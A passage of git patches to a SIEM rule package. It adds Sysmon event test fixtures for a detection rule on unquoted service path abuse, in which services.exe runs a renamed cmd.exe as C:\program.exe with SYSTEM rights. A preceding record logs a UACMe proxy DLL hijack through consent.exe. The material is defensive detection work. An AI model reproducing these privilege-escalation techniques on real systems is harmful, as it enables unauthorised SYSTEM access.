MD5:9E5AED3F57CEBC5154F9373B2BB9BA05 SHA256:FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.original_name": "Ikazuchi.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\", "object.property": "signature status", "object.value": "not signed", "status": "success", "subject": "process", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.session_id": "999", "subject.process.chain": "consent.exe ← svchost.exe ← services.exe ← wininit.exe ← smss.exe ← smss.exe", "subject.process.cmdline": "consent.exe 368 272 00000285D6BE22C0", "subject.process.cwd": "C:\\Windows\\system32\\", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "20fff121-f8dd-647d-8401-000000003900", "subject.process.hash": "IMPHASH:1275A84E15AAA739F3099F6A73D7D6FA MD5:C67713C28BB97E685FEB88FFAEB96788 SHA256:6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "subject.process.hash.md5": "C67713C28BB97E685FEB88FFAEB96788", "subject.process.hash.sha256": "6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "subject.process.id": "2328", "subject.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "subject.process.name": "consent.exe", "subject.process.original_name": "consent.exe", "subject.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p", "subject.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.parent.guid": "20fff121-f3f8-647d-1300-000000003900", "subject.process.parent.id": "368", "subject.process.parent.name": "svchost.exe", "subject.process.parent.path": "c:\\windows\\system32\\", "subject.process.path": "c:\\windows\\system32\\", "subject.process.version": "10.0.17763.3232 (WinBuild.160101.0800)"} + From ce7ec2039d08da73a84965e9ac9665cd67df69aa Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Wed, 2 Aug 2023 11:51:25 +0300 Subject: [PATCH 54/57] =?UTF-8?q?=20=D0=A0=D0=B0=D1=81=D1=88=D0=B8=D1=80?= =?UTF-8?q?=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4=D0=B0=D0=BD?= =?UTF-8?q?=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80=D1=8B=D0=B5?= =?UTF-8?q?=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20?= =?UTF-8?q?=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0?= =?UTF-8?q?=20=20=20(Unquoted=5FService=5FPath=5FAbuse)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../tests/test_1.sc | 92 ++++++++++++++++++- .../tests/test_2.sc | 6 +- .../tests/test_3.sc | 5 +- 3 files changed, 92 insertions(+), 11 deletions(-) diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_1.sc index 1da2f4da..c5fadb6c 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Unquoted_Service_Path_Abuse/tests/test_1.sc @@ -1,6 +1,90 @@ -# Здесь укажи какие нормализованные события (одно или несколько) ты подаёшь на вход правилу корреляции. -# События отделяются друг от друга символом новой строки. Каждое их них должно быть записано в строку. -{ "action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:28.0807172Z\"},\"EventRecordID\":\"27636\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - Potential Unquoted Service Exploit\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.317\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010e7880100}\"},{\"Name\":\"ProcessId\",\"text\":\"2856\"},{\"Name\":\"Image\",\"text\":\"C:\\\\program.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.592 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"Cmd.Exe\"},{\"Name\":\"CommandLine\",\"text\":\"c:\\\\Program Files\\\\vulnsvc\\\\mmm.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - Potential Unquoted Service Exploit", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "c:\\Program Files\\vulnsvc\\mmm.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\program.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010e7880100", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "2856", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "program.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\", "object.process.version": "10.0.17763.592 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.317Z", "type": "raw", "uuid": "cfe86c74-2c29-4618-8dbf-fb8a14b34f3a" } +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:21:19.6296306Z\"},\"EventRecordID\":\"28173\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:21:19.623\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7df-5ea4-0000-001080711800}\"},{\"Name\":\"ProcessId\",\"text\":\"1396\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b7df-5ea4-0000-001080711800", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "1396", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.501Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:local service@nt authority", "subject.account.name": "local service", "subject.account.privileges": "System", "subject.account.session_id": "997", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:21:19.623Z", "type": "raw", "uuid": "560e565a-3e77-4652-9f0d-dbbccea434fa"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:21:19.3400272Z\"},\"EventRecordID\":\"28169\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:21:19.335\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7df-5ea4-0000-001052671800}\"},{\"Name\":\"ProcessId\",\"text\":\"992\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k NetworkService -p -s WinRM\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\NETWORK SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e4030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e4\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e4030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:network service@nt authority", "object.account.name": "network service", "object.account.privileges": "System", "object.account.session_id": "996", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k NetworkService -p -s WinRM", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b7df-5ea4-0000-001052671800", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "992", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.501Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:network service@nt authority", "subject.account.name": "network service", "subject.account.privileges": "System", "subject.account.session_id": "996", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:21:19.335Z", "type": "raw", "uuid": "a944f8a0-b923-4b47-9e25-4cb757f6a567"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:21:18.4123163Z\"},\"EventRecordID\":\"28154\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:21:18.407\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7de-5ea4-0000-0010fa4e1800}\"},{\"Name\":\"ProcessId\",\"text\":\"6548\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k NetworkService -p\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\NETWORK SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e4030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e4\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e4030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:network service@nt authority", "object.account.name": "network service", "object.account.privileges": "System", "object.account.session_id": "996", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k NetworkService -p", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b7de-5ea4-0000-0010fa4e1800", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "6548", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.502Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:network service@nt authority", "subject.account.name": "network service", "subject.account.privileges": "System", "subject.account.session_id": "996", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:21:18.407Z", "type": "raw", "uuid": "8033c5af-59af-440f-9932-35ef8bac1647"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:21:08.5643502Z\"},\"EventRecordID\":\"28134\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:21:08.560\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b7d4-5ea4-0000-0010e09b1700}\"},{\"Name\":\"ProcessId\",\"text\":\"2792\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e5030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e5\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e5030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:local service@nt authority", "object.account.name": "local service", "object.account.privileges": "System", "object.account.session_id": "997", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b7d4-5ea4-0000-0010e09b1700", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2792", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", 